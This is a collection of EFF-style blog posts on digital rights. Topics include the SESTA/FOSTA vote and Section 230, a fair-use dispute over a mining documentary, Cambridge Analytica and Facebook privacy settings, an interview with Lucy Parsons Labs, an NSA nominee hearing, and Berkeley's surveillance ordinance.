Today was a dark day for the Internet.
The U.S. Senate just voted 97-2 to pass the Allow States and Victims to Fight Online Sex Trafficking Act (FOSTA, H.R. 1865), a bill that silences online speech by forcing Internet platforms to censor their users. As lobbyists and members of Congress applaud themselves for enacting a law tackling the problem of trafficking, let’s be clear: Congress just made trafficking victims less safe, not more.
The version of FOSTA that just passed the Senate combined an earlier version of FOSTA (what we call FOSTA 2.0) with the Stop Enabling Sex Traffickers Act (SESTA, S. 1693). The history of SESTA/FOSTA—a bad bill that turned into a worse bill and then was rushed through votes in both houses of Congress—is a story about Congress’ failure to see that its good intentions can result in bad law. It’s a story of Congress’ failure to listen to the constituents who’d be most affected by the laws it passed. It’s also the story of some players in the tech sector choosing to settle for compromises and half-wins that will put ordinary people in danger.Silencing Internet Users Doesn’t Make Us Safer
SESTA/FOSTA undermines Section 230, the most important law protecting free speech online. Section 230 protects online platforms from liability for some types of speech by their users. Without Section 230, the Internet would look very different. It’s likely that many of today’s online platforms would never have formed or received the investment they needed to grow and scale—the risk of litigation would have simply been too high. Similarly, in absence of Section 230 protections, noncommercial platforms like Wikipedia and the Internet Archive likely wouldn’t have been founded given the high level of legal risk involved with hosting third-party content.
The bill is worded so broadly that it could even be used against platform owners that don’t know that their sites are being used for trafficking.
Importantly, Section 230 does not shield platforms from liability under federal criminal law. Section 230 also doesn’t shield platforms across-the-board from liability under civil law: courts have allowed civil claims against online platforms when a platform directly contributed to unlawful speech. Section 230 strikes a careful balance between enabling the pursuit of justice and promoting free speech and innovation online: platforms can be held responsible for their own actions, and can still host user-generated content without fear of broad legal liability.
SESTA/FOSTA upends that balance, opening platforms to new criminal and civil liability at the state and federal levels for their users’ sex trafficking activities. The platform liability created by new Section 230 carve outs applies retroactively—meaning the increased liability applies to trafficking that took place before the law passed. The Department of Justice has raised concerns [.pdf] about this violating the Constitution’s Ex Post Facto Clause, at least for the criminal provisions.
The bill also expands existing federal criminal law to target online platforms where sex trafficking content appears. The bill is worded so broadly that it could even be used against platform owners that don’t know that their sites are being used for trafficking.
Finally, SESTA/FOSTA expands federal prostitution law to cover those who use the Internet to “promote or facilitate prostitution.”
The Internet will become a less inclusive place, something that hurts all of us.
It’s easy to see the impact that this ramp-up in liability will have on online speech: facing the risk of ruinous litigation, online platforms will have little choice but to become much more restrictive in what sorts of discussion—and what sorts of users—they allow, censoring innocent people in the process.
What forms that erasure takes will vary from platform to platform. For some, it will mean increasingly restrictive terms of service—banning sexual content, for example, or advertisements for legal escort services. For others, it will mean over-reliance on automated filters to delete borderline posts. No matter what methods platforms use to mitigate their risk, one thing is certain: when platforms choose to err on the side of censorship, marginalized voices are censored disproportionately. The Internet will become a less inclusive place, something that hurts all of us.Big Tech Companies Don’t Speak for Users
SESTA/FOSTA supporters boast that their bill has the support of the technology community, but it’s worth considering what they mean by “technology.” IBM and Oracle—companies whose business models don’t heavily rely on Section 230—were quick to jump onboard. Next came the Internet Association, a trade association representing the world’s largest Internet companies, companies that will certainly be able to survive SESTA while their smaller competitors struggle to comply with it.
Those tech companies simply don’t speak for the Internet users who will be silenced under the law. And tragically, the people likely to be censored the most are trafficking victims themselves.SESTA/FOSTA Will Put Trafficking Victims in More Danger
Throughout the SESTA/FOSTA debate, the bills’ proponents provided little to no evidence that increased platform liability would do anything to reduce trafficking. On the other hand, the bills’ opponents have presented a great deal of evidence that shutting down platforms where sexual services are advertised exposes trafficking victims to more danger.
Freedom Network USA—the largest national network of organizations working to reduce trafficking in their communities—spoke out early to express grave concerns [.pdf] that removing sexual ads from the Internet would also remove the best chance trafficking victims had of being found and helped by organizations like theirs as well as law enforcement agencies.
Reforming [Section 230] to include the threat of civil litigation could deter responsible website administrators from trying to identify and report trafficking.
It is important to note that responsible website administration can make trafficking more visible—which can lead to increased identification. There are many cases of victims being identified online—and little doubt that without this platform, they would have not been identified. Internet sites provide a digital footprint that law enforcement can use to investigate trafficking into the sex trade, and to locate trafficking victims. When websites are shut down, the sex trade is pushed underground and sex trafficking victims are forced into even more dangerous circumstances.
Freedom Network was far from alone. Since SESTA was introduced, many experts have chimed in to point out the danger that SESTA would put all sex workers in, including those who are being trafficked. Sex workers themselves have spoken out too, explaining how online platforms have literally saved their lives. Why didn’t Congress bring those experts to its deliberations on SESTA/FOSTA over the past year?
While we can’t speculate on the agendas of the groups behind SESTA, we can study those same groups’ past advocacy work. Given that history, one could be forgiven for thinking that some of these groups see SESTA as a mere stepping stone to banning pornography from the Internet or blurring the legal distinctions between sex work and trafficking.
In all of Congress’ deliberations on SESTA, no one spoke to the experiences of the sex workers that the bill will push off of the Internet and onto the dangerous streets. It wasn’t surprising, then, when the House of Representatives presented its “alternative” bill, one that targeted those communities more directly.“Compromise” Bill Raises New Civil Liberties Concerns
In December, the House Judiciary Committee unveiled its new revision of FOSTA. FOSTA 2.0 had the same inherent flaw that its predecessor had—attaching more liability to platforms for their users’ speech does nothing to fight the underlying criminal behavior of traffickers.
In a way, FOSTA 2.0 was an improvement: the bill was targeted only at platforms that intentionally facilitated prostitution, and so would affect a narrower swath of the Internet. But the damage it would do was much more blunt: it would expand federal prostitution law such that online platforms would have to take down any posts that could potentially be in support of any sex work, regardless of whether there’s an indication of force or coercion, or whether minors were involved.
FOSTA 2.0 didn’t stop there. It criminalized using the Internet to “promote or facilitate” prostitution. Activists who work to reduce harm in the sex work community—by providing health information, for example, or sharing lists of dangerous clients—were rightly worried that prosecutors would attempt to use this law to put their work in jeopardy.
Regardless, a few holdouts in the tech world believed that their best hope of stopping SESTA was to endorse a censorship bill that would do slightly less damage to the tech industry.
They should have known it was a trap.SESTA/FOSTA: The Worst of Both Worlds
When the Department of Justice is the group urging Congress not to expand criminal law and Congress does it anyway, something is very wrong.
Thousands of you picked up your phone and called your senators, urging them to oppose the new Frankenstein bill. And you weren’t alone: EFF, the American Civil Liberties Union, the Center for Democracy and Technology, and many other experts pleaded with Congress to recognize the dangers to free speech and online communities that the bill presented.
Even the Department of Justice wrote a letter urging Congress not to go forward with the hybrid bill [.pdf]. The DOJ said that the expansion of federal criminal law in SESTA/FOSTA was simply unnecessary, and could possibly undermine criminal investigations. When the Department of Justice is the group urging Congress not to expand criminal law and Congress does it anyway, something is very wrong.
Assuming that the president signs it into law, SESTA/FOSTA is the most significant rollback to date of the protections for online speech in Section 230. We hope that it’s the last, but it may not be. Over the past year, we’ve seen more calls than ever to create new exceptions to Section 230.
In any case, we will continue to fight back against proposals that undermine our right to speak and gather online. We hope you’ll stand with us.
When a mining company sent a cease and desist letter aimed at a critical documentary, the Southeast Alaska Conservation Council (SEACC) worked with the Electronic Frontier Foundation to help them respond. Hecla Mining Company claimed [PDF] that SEACC had infringed Hecla’s copyright by using short clips from a Hecla promotional video. We worked with SEACC to draft and send a letter [PDF] explaining that this was a classic fair use of Hecla’s material. In response, Hecla withdrew its demand. While this case resolved the right way, it shows that even elementary fair use sometimes requires the counsel of a lawyer.
“Irreparable Harm” is a short film sponsored by SEACC. The movie is about Alaska’s Admiralty Island, a National Monument which has been inhabited by the Tlingit people for thousands of years. In addition to several hundred people living in the Tlingit village of Angoon, the huge island near Juneau is also home to an estimated 2,500 bald eagles, more than 1,000 bears, and one silver mine—Hecla’s Greens Creek Mine.
The documentary explores the mine’s relationship with its Tlingit neighbors, highlighting pollution levels in traditional Tlingit food sources. SEACC says contamination has increased since Greens Creek, the only mine operating within a U.S. National Monument, began production in 1989.
This year, “Irreparable Harm” is screening in cities around the country. The film has screened at several environmental-themed film festivals, including the Wild & Scenic Film Festival, which is shown around the country—which apparently didn’t sit too well with Hecla Mining Company. Instead of offering a substantive response to the film, Hecla hired big-city lawyers in an attempt to shut down the movie with a spurious copyright claim against the nine-person grassroots environmental organization from Juneau.
In a letter sent last month, Hecla claimed that SEACC’s use of footage from a company promotional video about Greens Creek violated the Copyright Act. Ignoring SEACC’s fair use rights, the letter goes on to demand that SEACC “cease any and all reproduction of Hecla’s copyrighted works, including but not limited to, any showings of the Irreparable Harm film.”
EFF responded to Hecla’s demands on behalf of SEACC. We pointed out what should have been obvious—that the use of short clips in a critical documentary is “a paradigmatic case of fair use.” SEACC used just 28 seconds of footage from Hecla’s promotional video, combining it with voice-over commentary on Hecla’s mining practices.
Hecla has since backed off, stating [PDF] that it has “decided not to take further action” at this time. We’re glad that we were able to help SEACC in this case. But filmmakers shouldn’t have to hire a lawyer to protect their fundamental right to free expression. Copyright is meant to spur the production of new works, but unfortunately, it’s all too easy to use it as a tool of censorship (in this case we might call it a Hecla’s Veto).
Don’t let the potential of a copyright threat squelch your speech. For those seeking guidance on future projects, the Association of Independent Video and Filmmakers has a “best practices” guide to fair use, and is a veritable “silver mine” of information.
To schedule a viewing of SEACC’s film or find one near you, contact the organization directly at email@example.com.
Last weekend’s Cambridge Analytica news—that the company was able to access tens of millions of users’ data by paying low-wage workers on Amazon’s Mechanical Turk to take a Facebook survey, which gave Cambridge Analytica access to Facebook’s dossier on each of those turkers’ Facebook friends—has hammered home two problems: first, that Facebook’s default privacy settings are woefully inadequate to the task of really protecting user privacy; and second, that ticking the right boxes to make Facebook less creepy is far too complicated. Unfortunately for Facebook, regulators in the U.S. and around the world are looking for solutions, and fast.
But there’s a third problem, one that platforms and regulators themselves helped create: the plethora of legal and technical barriers that make it hard for third parties—companies, individual programmers, free software collectives—to give users tools that would help them take control of the technologies they use.
Think of an ad-blocker: you view the web through your browser, and so you get to tell your web-browser which parts of a website you want to see and which parts you want to ignore. You can install plugins to do trivial things, like replace the word “millennials” with “snake people”—and profound things, like making the web readable by people with visual impairments.
Ad-blockers are nearly as old as the web. In the early days of the web, they broke the deadlock over pop-up ads, allowing users to directly shape their online experience, leading to the death of pop-ups as advertisers realized that serving a pop-up was a guarantee that virtually no one would see your ad. We—the users—decided what our computers would show us, and businesses had to respond.
Web pioneer Doc Searls calls the current generation of ad-blockers “the largest consumer revolt in history.” The users of technology have availed themselves of the tools to give them the web they want, not the web that corporations wanted us to have. The corporations that survive this revolt will be the ones who can deliver services that users are willing to use without add-ons that challenge their business-models.
In his 1999 classic Code and Other Laws of Cyberspace, Lawrence Lessig argued that our world is regulated by four forces:
- Law: what's legal
- Markets: what's profitable
- Norms: what's morally acceptable
- Code: what's technologically possible
Under ideal conditions, companies that do bad things with technology are shamed and embarrassed by bad press (norms); they face lawsuits and regulatory action (law); they lose customers and their share-price dips (markets); and then toolsmiths make add-ons for their product that allow us all to use them safely, without giving up our personal information, or being locked into their software store, or having to get repairs or consumables from the manufacturer at any price (code).
But an increasing slice of the web is off-limits to the “code” response to bad behavior. When a programmer at Facebook makes a tool that allows the company to harvest the personal information of everyone who visits a page with a “Like” button on it another programmer can write a browser plugin that blocks this button on the pages you visit.
This week, we made you a tutorial explaining the torturous process by which you can change your Facebook preferences to keep the company’s “partners” from seeing all your friends’ data. But what many folks would really like to do is give you a tool that does it for you: go through the tedious work of figuring out Facebook’s inscrutable privacy dashboard, and roll that expertise up in a self-executing recipe—a piece of computer code that autopiloted your browser to login to Facebook on your behalf and ticked all the right boxes for you, with no need for you to do the fiddly work.
But they can’t. Not without risking serious legal consequences, at least. A series of court decisions—often stemming from the online gaming world, sometimes about Facebook itself—has made fielding code that fights for the user into a legal risk that all too few programmers are willing to take.
That's a serious problem. Programmers can swiftly make tools that allow us to express our moral preferences, allowing us to push back against bad behavior long before any government official can be convinced to take an interest—and if your government never takes an interest, or if you are worried about the government's use of technology to interfere in your life, you can still push back, with the right code.
Today, we are living through a“techlash” in which the world has woken up to realize that a single programmer can make choices that affect millions—billions—of peoples’ lives. America’s top computer science degree programs are making ethics an integral part of their curriculum. The ethical epiphanies of geeks have profoundly shaped the way we understand our technology (if only all technologists were so concerned with the ethics of their jobs).
We need technologists to thoughtfully communicate technical nuance to lawmakers; to run businesses that help people master their technology; to passionately make the case for better technology design.
But we also need our technologists to retain the power to affect millions of lives for the better. Skilled toolsmiths can automate the process of suing Equifax, filing for housing aid after you’re evicted, fighting a parking ticket or forcing an airline to give you a refund if your ticket’s price drops after you buy it (and that’s all just one programmer, and he hasn’t even graduated yet!).
When we talk about “walled gardens,” we focus on the obvious harms: an App Store makes one company the judge, jury and executioner of whose programs you can run on your computer; apps can’t be linked into and disappear from our references; platforms get to spy on you when you use them; opaque algorithms decide what you hear (and thus who gets to be heard).
But more profoundly, the past decade’s march to walled gardens has limited what we can do about all these things. We still have ad-blockers (but not for “premium video” anymore, because writing an ad-blocker that bypasses DRM is a potential felony), but we can’t avail ourselves of tools to auto-configure our privacy dashboards, or snoop on our media players to see if they’re snooping on us, or any of a thousand other useful and cunning improvements over our technologically mediated lives.
Because in the end, the real risk of a walled garden isn’t how badly it can treat us: it’s how helpless we are to fight back against it with our own, better code. If you want to rein in Big Tech, it would help immensely to have lots of little tech in use showing how things might be if the giants behaved themselves. If you want your friends to stop selling their private information for a mess of potage, it would help if you could show them how to have an online social life without surrendering their privacy. If you want the people who bet big on the surveillance business-model to go broke, there is no better way to punish them in the marketplace than by turning off the data-spigot with tools that undo every nasty default they set in the hopes that we'll give up and use products their way, not ours.Related Cases: Facebook v. Power VenturesBlizzard v. BNETD
You shouldn't have to do this. You shouldn't have to wade through complicated privacy settings in order to ensure that the companies with which you've entrusted your personal information are making reasonable, legal efforts to protect it. But Facebook has allowed third parties to violate user privacy on an unprecedented scale, and, while legislators and regulators scramble to understand the implications and put limits in place, users are left with the responsibility to make sure their profiles are properly configured.
Over the weekend, it became clear that Cambridge Analytica, a data analytics company, got access to more than 50 million Facebook users' data in 2014. The data was overwhelmingly collected, shared, and stored without user consent. The scale of this violation of user privacy reflects how Facebook's terms of service and API were structured at the time. Make no mistake: this was not a data breach. This was exactly how Facebook's infrastructure was designed to work.
In addition to raising questions about Facebook's role in the 2016 presidential election, this news is a reminder of the inevitable privacy risks that users face when their personal information is captured, analyzed, indefinitely stored, and shared by a constellation of data brokers, marketers, and social media companies.
Tech companies can and should do more to protect users, including giving users far more control over what data is collected and how that data is used. That starts with meaningful transparency and allowing truly independent researchers—with no bottom line or corporate interest—access to work with, black-box test, and audit their systems. Finally, users need to be able to leave when a platform isn’t serving them — and take their data with them when they do.
Of course, you could choose to leave Facebook entirely, but for many that is not a viable solution, unfortunately. For now, if you'd like keep your data from going through Facebook's API, you can take control of your privacy settings. Keep in mind that this disables ALL platform apps (like Farmville, Twitter, or Instagram) and you will not be able to log into sites using your Facebook login.
Log into Facebook and visit the App Settings page (or go there manually via the Settings Menu > Apps ).
From there, click the "Edit" button under "Apps, Websites and Plugins." Click "Disable Platform."
If disabling platform entirely is too much, there is another setting that can help: limiting the personal information accessible by apps that others use. By default, other people who can see your info can bring it with them when they use apps, and your info becomes available to those apps. You can limit this as follows.
From the same page, click "Edit" under "Apps Others Use." Then uncheck the types of information that you don't want others' apps to be able to access. For most people reading this post, that will mean unchecking every category.
Savvy parents know that every cloud-connected electronic gadget they buy for their kids is a potential hole in their network, a sneaky listening device that hangs around some of the most sensitive and personal moments of you kids' lives and the lives of your whole family. But tomorrow's smart parents know that those toys are a potential platform for innovation, places where parents, programmers and businesses can work to create new operating systems that never talk to the cloud, and that replace the canned messages of a distant corporate design department with material of your own choosing.
Here at the Electronic Frontier Alliance, we’re lucky to have incredible member organizations engaging in advocacy on our issues across the U.S. One of those groups in Chicago, Lucy Parsons Labs (LPL), has done incredible work taking on a range of civil liberties issues. They’re a dedicated group of advocates volunteering to make their world (and the Windy City) a better, more equitable place.
We sat down with one of the founders of LPL, Freddy Martinez, to gain a better understanding of the Lab and how they use their collective powers for good.
How would you describe Lucy Parsons Labs? How did the organization get started, and what need were you trying to fill?
The lab got started four years back when a few people doing digital security training in Chicago saw there was need for a more technical group that could bridge the gap between advocacy and technology. We each had areas of interest and expertise that we were doing activism around, and it grew pretty organically from there. For example, lawmakers would try to pass a bill without fully understanding the full implications that the piece of legislation would have, technologically or otherwise. We began to work together on these projects to educate lawmakers and inform the public on these issues as a friend group, and the organization grew out of that as we added or expanded projects. We do a lot of public records requests and work on police transparency, but our group has broad, varied interests. The common thread that runs through the work is that we have a lot of expertise in a lot of different advocacy areas, and we leverage that expertise to make the world better. It lets us sail in many different waters.
LPL participates in the Electronic Frontier Alliance (EFA), a network of grassroots digital rights groups around the country. Your work in Chicago runs the gamut from advocating for transparency in the criminal justice system, to investigating civil asset forfeiture, from operating a SecureDrop system for whistleblowers, to investigating the use of cell-simulators by the Chicago Police Department. Given that, how does the EFA play into your work?
I feel that the more the organization grows, the more having groups around the country who are building capacity is key to making sure that these projects get done. There’s such a huge amount of work to be done, and having other partners who are interested in various subsections of our work and can help us achieve our goals is really valuable. EFA provides us access to a diverse array of experts, from academics and lawyers to grassroots activists. It gives us a lot of leverage, and lets us share our subject matter expertise in ways we wouldn’t be able to if we were going it alone.
Let’s talk surveillance. LPL has done incredible work via the open records process to expose the use of cell-site simulators (sometimes referred to as “Stingrays” or IMSI Catchers) by the Chicago Police Department. Can you tell us about how you started investigating, and why these kinds of surveillance need to be brought into the public conversation?
I actually heard of this equipment through news reporting—you would see major cities buying these devices, and then troubling patterns began to emerge. Prosecutors would begin dropping cases because they didn’t want to tell defense attorneys where they got the information or how. There were cases of parallel construction. After noticing this trend, I sent my first public records request to get info on whether the Chicago Police Department had bought any. Instead of following the law, they decided to ignore the request until a judge ordered them to release the records. They were ostensibly used for the war on drugs, but usually they are used overseas in the war on terror. They test these technologies on black and brown populations in war zones, then bring them back to surveil their citizens. It’s an abuse of power and an invasion of privacy. We need to be talking about this. We think that there’s a reason that this stuff is acquired in secret, because people would not be okay with their government doing this if they knew.
LPL has done tons of community work in the anti-surveillance realm as well. Why do you believe educating people about how they can protect themselves from surveillance is important?
I think that you need to give people the breathing room to participate in society safely. Surveillance is usually thought of as an eye in the sky watching over your every move, but it’s so much more pervasive than that. We think about these things in abstract ways, with very little understanding of how they can affect our daily lives. A way to frame the importance of, say, encryption, is to use the example of medical correspondence. If you’re talking to your doctor, you don’t want your messages to be seen by anyone else. It’s critical to have these discussions and decisions made in public so that people can make informed decisions about their lives and privacy. This is a broader responsibility we have as a society, and to each other.
Do you have any advice for other community-based advocacy groups based on your experience?
I have found that being organized is extremely important. We’re a small team of volunteers, so we have to keep things really well documented, especially when dealing with something like public records requests. You also have to, and I can’t stress this enough, enjoy the work and make sure you don’t burn out. It’s a labor of love—you need to be invested in these projects and taking care of yourself in order to do effective activism. Otherwise the work will suffer.
LPL has partnered with other organizations and community groups in the past. What are some ways that you’ve found success in coalition building? What advice would you give to other groups that would like to work more collaboratively with their peer groups?
LPL is also part of a larger group called the Chicago Data Collaborative, where we are working on sharing and analyzing data on the criminal justice system. One of the most important pieces of information to know before embarking on a multi-organization enterprise is that you will have to do a lot of capacity building in order to work together effectively. You’ll need to set aside a lot of time and effort to context build for those not in the know. You must be “in the room” (whether that’s digital or physical) for dedicated, direct collaboration. This is what makes or breaks a good partnership.
Anything else you’d like to add?
I have a bit of advice for people who’d like to get involved in grassroots activism and advocacy, but aren’t sure where to start: You’ll never know when you’re going to come across these projects. Being curious and following your gut will take you down weird rabbit holes. Get started somewhere and follow your gut. You’ll be surprised how far that will take you.
This interview has been lightly edited for length and readability.
Lt. Gen. Paul Nakasone, the new nominee to direct the NSA, faced questions Thursday from the Senate Select Committee on Intelligence about how he would lead the spy agency. One committee member, Senator Ron Wyden (D-OR), asked the nominee if he and his agency could avoid the mistakes of the past, and refuse to participate in any new, proposed spying programs that would skirt the law and violate Americans’ constitutional rights.
“In 2001, then-President Bush directed the NSA to conduct an illegal, warrantless wiretapping program. Neither the public nor the full intelligence committee learned about this program until it was revealed in the press,” Wyden said. Wyden, who was a member of the committee in 2001, said he personally learned about the NSA surveillance program—which bypassed judicial review required from the Foreign Intelligence Surveillance Court—by reading about it in the newspaper. Sen. Wyden continued:
“If there was a form of surveillance that currently requires approval by the [Foreign Intelligence Surveillance Court] and you were asked to avoid the court, based on some kind of secret legal analysis, what would you do?”
Lt. Gen. Nakasone deferred, assuring Sen. Wyden that he would receive a “tremendous amount of legal advice” in his new job, if confirmed.
Sen. Wyden interrupted: “Let me just stop it right there, so I can learn something that didn’t take place before. You would, if asked, tell the entire committee that you had been asked to [review such a program]?”
“Senator,” Lt. Gen. Nakasone responded, “I would say that I would consult with the committee—”
“When you say consult,” Wyden interrupted again, “you would inform us that you had been asked to do this?”
Lt. Gen. Nakasone repeated himself: he would consult with the committee, and keep senators involved in such discussions. Lt. Gen. Nakasone added, though, that “at the end of the day, Senator, I would say that there are two things I would do. I would follow the law, and I would ensure, if confirmed, that the agency follows the law.”
Sen. Wyden took it as a win.
“First of all, that’s encouraging,” Wyden said, “because that was not the case back in 2001.”
“In 2001, the President said we’re going to operate a program that clearly was illegal. Illegal! You’ve told us now, you’re not going to do anything illegal. That’s a plus. And you told us that you would consult with us if you were ever asked to do something like that. So, I appreciate your answer.”
Sen. Wyden also asked Lt. Gen. Nakasone about encryption. Sen. Wyden asked Lt. Gen. Nakasone if he agreed with encryption experts’ opinion that, if tech companies were required to “permit law enforcement access to Americans’ private communications and data,” then such access could be exploited by “sophisticated, foreign government hackers,” too.
Again, Lt. Gen. Nakasone avoided a direct yes or no answer, and again, Sen. Wyden interrupted.
“My time is up, general. Just a yes-or-no answer to the question, with respect to what experts are saying,” Wyden said. “Experts are saying that the tech companies can’t modify their encryption to permit law enforcement access to Americans’ private communications without the bad guys getting in, too. Do you disagree with the experts, that’s just a yes or no.”
“I would offer Senator,” Lt. Gen. Nakasone said, “that it’s a conditional yes.”
Wyden, a staunch encryption advocate in the Senate, interpreted Lt. Gen. Nakasone’s answer positively. “That’s encouraging as well,” Wyden said. “I look forward to working with you in the days ahead.”
Senate Intelligence Committee Chairman Richard Burr (R-NC), at the close of the hearing, said he would like to swiftly move Lt. Gen. Nakasone’s nomination further. If other Senators have the opportunity to question Lt. Gen. Nakasone about his potential leadership of the NSA, we hope they ask pointed, necessary questions about the agency’s still-ongoing surveillance program Section 702, and how the nominee plans to reconcile the agency’s widespread, invasive spying program with Americans’ constitutional right to privacy.
Some of the biggest names in the U.S. entertainment industry have expressed a recent interest in a topic that’s seemingly far away from their core business: shutting down online prostitution. Disney, for instance, recently wrote to key U.S. senators expressing their support for SESTA, a bill that was originally aimed at sex traffickers. For its part, 20th Century Fox told the same senators that anyone doing business online “has a civic responsibility to help stem illicit and illegal activity.”
Late last year, the bill the entertainment companies supported morphed from SESTA into FOSTA, and then into a kind of Frankenstein bill that combines the worst aspects of both. The bill still does nothing to catch or punish traffickers, or provide help to victims of sex trafficking.
As noted by Freedom Network USA, the largest coalition of organizations working to fight human trafficking, law enforcement already has the ability to go after sex traffickers and anyone who helps them. Responsible web operators can help in that task. The civil liabilities imposed by FOSTA could actually harm the hunt for perpetrators.
Freedom Network suggests the better approach would be to provide services and support to victims, but that’s not what FOSTA does. What it does do is offer a powerful incentive for online platforms to police the speech of users and advertisers. A perceived violation of a state’s anti-trafficking laws could lead to authorities seeking civil or criminal penalties, or a barrage of lawsuits.
So, why are movie studios involved at all in this debate? Hollywood is lobbying for laws that will force online intermediaries to shut down user speech. That’s what they’ve been seeking since practically the beginning of the Internet.A Brief History of Safe Harbors
The Internet as we know it is underpinned by two critical laws that have allowed user speech to blossom: Section 230 of the Communications Decency Act, and 17 U.S. Code § 512, which outlines the “safe harbor” provisions of the Digital Millennium Copyright Act, or DMCA.
Section 230 prevents online platforms from being held liable, in many cases, for their users’ speech. Platforms are free to moderate speech in a way that works for them—removing spam or trolling comments, for instance—without being compelled to read each comment, or view each video, a task that’s simply impossible on sites with thousands or millions of users.
Similarly, the DMCA safe harbor shields the same service providers from copyright damages based on user infringement, as long as they follow certain guidelines. The two laws work together to send a clear message: in the online world, users are responsible for their own actions and speech, and online platforms can mediate that speech—or not—as fits the needs of their community.
For two decades now, Section 230 and the DMCA have complemented each other, allowing for an explosion of online creativity. Without the DMCA safe harbor, small businesses could face bankruptcy over the copyright infringement of a few users. And without Section 230, the same businesses could be sued for a vast array of user misbehavior that they didn’t even know about. Lawsuits for libel or invasion of privacy, for instance, could be aimed at the platform, rather than the person who actually committed those acts.
Without these key legal protections, many sites would make the safe choice and simply choose to not host free and unfettered discussions. Others might begin to police user content overzealously, removing or blocking lots of lawful speech for fear of letting something illegal slip through. The safe harbors keep the focus for any online wrongdoing on the actual wrongdoer, whether it’s a civil violation like copyright infringement, or criminal acts.
It’s hardly a free-for-all for the companies protected by the safe harbors, which have significant limits. Online platforms that edit or direct user speech that violates the law, for instance, can’t avail themselves of Section 230 protections. It’s fine to run online advertisements, but sites that help users post ads for illegal or discriminatory content can be, and have been, held accountable.
Section 230 doesn’t offer any shield against federal criminal law, and one doesn’t have to look far to find website operators that have been punished under those laws. The operator of the online marketplace Silk Road, for instance, was convicted of federal drug trafficking offences.
Nor does protection accrue to websites that make contributions, even small ones, to illegal content. An online housing website, Roommates.com, lost Section 230 protection simply because it required users to answer questions that could be used in housing discrimination. While EFF has long expressed concerns about the free speech implications of the 2008 Fair Housing Council v. Roommates.com decision, it remains the law and demonstrates that Section 230 is far from a free pass.
Likewise, the DMCA safe harbors only apply if an online platform complies with numerous requirements, including implementing a repeat-infringer policy and responding to notices of infringement by taking down content.Towards a Filtered Net?
For legacy software and entertainment companies, breaking down the safe harbors is another road to a controlled, filtered Internet—one that looks a lot like cable television. Without safe harbors, the Internet will be a poorer place—less free for new ideas and new business models. That suits some of the gatekeepers of the pre-Internet era just fine.
The not-so-secret goal of SESTA and FOSTA is made even more clear in a letter from Oracle. “Any start-up has access to low cost and virtually unlimited computing power and to advanced analytics, artificial intelligence and filtering software,” wrote Oracle Senior VP Kenneth Glueck. In his view, Internet companies shouldn’t “blindly run platforms with no control of the content.”
That comment helps explain why we’re seeing support for FOSTA and SESTA from odd corners of the economy: some companies will prosper if online speech is subject to tight control. An Internet that’s policed by “copyright bots” is what major film studios and record have advocated for more than a decade now. Algorithms and artificial intelligence have made major advances in recent years, and some content companies have used those advances as part of a push for mandatory, proactive filters. That’s what they mean by phrases like “notice-and-stay-down,” and that’s what messages like the Oracle letter are really all about.
Software filters can provide a useful first take in moderating content, but they need proper supervision from humans. Bots still can’t determine when use of copyrighted material is fair use, for instance, which is why a best practice is to always let human creators dispute the determination of an automated filter.
Similarly, it’s unlikely that an automated filter will be able to determine the nuanced difference between actual online sex-trafficking and a discussion about sex-trafficking. Knocking down safe harbors will lead to an over-reliance on flawed filters, which can easily silence the wrong people.
Those filters would create a huge barrier to entry for startups, non-profits, and hobbyists. And at the end of the day, they’d hurt free speech. Saying that new technology can produce a successful filter is a fallacy—bots simply can’t do fair use.
So when Hollywood and entrenched tech interests suddenly take a new interest in the problem of sex trafficking, it’s fair to wonder why. After all, an Internet subject to corporate filters will make it harder, not easier, to hunt down and prosecute sex traffickers.
Punching a hole in safe harbors to reshape the Internet has been the project, in many different forms, for more than a decade now. The FOSTA bill, if it passes the Senate, will be the first major success in dismantling a safe harbor. But don’t count on it to be the last.
Stop SESTA and FOSTA
Visit The Catalog of Missing Devices, a collection of tools, services, and products that could have been, but never were, because of DRM.
For the most part, rightsholders don't object to user-created subtitling, which is key to making videos available to non-native speakers of the media's original language, and accessible to people with hearing disabilities. Fansubbing and similar practices predate internet videos by decades, but creating a crowdsourced subtitling tool becomes a potential felony once DRM gets in the picture, if the DRM has to be bypassed to get the subtitles in.
Berkeley’s City Council voted unanimously this week to pass the Surveillance Technology and Community Safety Ordinance into law. (This is an earlier draft of the ordinance. We’ll update this link when the approved version is published.) Berkeley joins Santa Clara County (which adopted a similar law in June of 2016) in showing the way for the rest of California. In addition to considerable and unopposed spoken support during the public comment portion of the hearing, Mayor Jesse Arreguín reported that he and the City Council had received almost 200 letters and emails asking for the law to be adopted.
EFF has long supported this ordinance. During this week’s public comment, Jason Kelley spoke not only as EFF’s digital strategist but as a local resident and community member. He shared that “my friends and I—many of whom live here—are concerned that surveillance tech might be purchased and used without proper oversight.”
The ordinance, part of a nationwide effort to require community control of police surveillance, will address the concerns Kelley and so many in the community share. The new law will require that before acquiring surveillance technology, city departments submit use policies and acquisition reports detailing what will be acquired and how it works. These reports must also outline potential impacts on civil liberties and civil rights as well as steps to ensure adequate security measures safeguarding the data collected or generated.
These requirements are particularly important in light of recent reports that Automated License Plate Reader (ALPR) data collected by police is being shared with ICE. In response to these reports, the City of Alameda recently voted against acquiring new ALPRs. During this week’s Berkeley city council meeting, the police chief stated that the Berkeley police department was not sharing any information acquired through their own ALPRs with third parties. The new ordinance will assure that equipment acquired in the future will be approved only after such policies have been made public and reviewed.
While the meeting lasted into the late hours of the night, the path to this important legislation has been ongoing for over a year. EFF worked alongside over dozens of local partners, including Oakland Privacy (a member of the Electronic Frontier Alliance), the ACLU, the Council of American Islamic Relations, the Center for Media Justice, and Restore the Fourth.
With Santa Clara County and Berkeley now working diligently to protect the civil liberties of their residents, requiring public comment and city council approval on whether or not to acquire surveillance equipment, hope is high that similar ordinances will soon be passed in the cities of Davis and Oakland and by the Bay Area Rapid Transit system.
Technology has the power to improve our lives. It can make our government more accountable and efficient, and expose us to new information. But it also can intrude on our privacy and chill our free speech. Now more than ever, public safety requires trust between law enforcement and the community served. That trust is by necessity built in transparency and clear processes that balance public safety with the maintenance of the most essential of civil liberties. The Community Control of Police Surveillance ordinance model assures all residents are afforded a voice in that process. Groups like Oakland Privacy in the Bay Area, and Privacy Watch in St. Louis, are working hard to assure similar ordinances are adopted in their communities. Visit the Electronic Frontier Alliance homepage to find or start an allied organization in your area.
